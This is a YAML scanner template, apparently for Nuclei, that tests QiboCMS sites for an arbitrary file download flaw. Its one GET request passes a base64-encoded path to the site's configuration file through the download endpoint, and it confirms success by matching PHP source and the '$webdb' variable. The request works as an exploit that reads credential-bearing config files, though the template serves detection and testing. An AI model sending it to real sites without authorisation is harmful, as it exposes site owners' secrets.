36 lines
784 B
YAML
36 lines
784 B
YAML
id: qibocms-file-download
|
|
|
|
info:
|
|
name: Qibocms - Arbitrary File Download
|
|
author: theabhinavgaur
|
|
severity: high
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: qibocms,lfr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<?php"
|
|
- "$webdb"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "filename=config"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402202c6815be4e274af7b5159756be6be0c4b40c2cb8c71c10b9657760b563d5a1d90220754631b38babc7faee6778bcedccf957f1bcb73b3d49c3408a3ce7947b087005:922c64590222798bb761d5b6d8e72950
|